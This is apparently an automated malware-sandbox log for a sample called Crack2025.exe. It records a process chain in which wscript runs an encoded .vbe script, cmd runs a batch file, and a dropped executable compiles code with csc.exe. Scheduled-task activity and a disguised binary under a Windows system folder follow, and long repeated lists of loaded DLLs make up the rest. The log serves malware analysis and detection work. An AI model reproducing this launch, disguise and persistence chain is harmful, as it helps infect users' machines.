                          Source: C:\Users\user\Desktop\Crack2025.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Crtsvc\ComComponentRuntimeMonitor.exe "C:\Crtsvc/ComComponentRuntimeMonitor.exe"Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP"Jump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: version.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: apphelp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: version.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: sspicli.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: version.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeSection loaded: sspicli.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: version.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: uxtheme.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.storage.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wldp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: profapi.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptsp.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rsaenh.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptbase.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sspicli.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mscoree.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: kernel.appcore.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: version.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dll
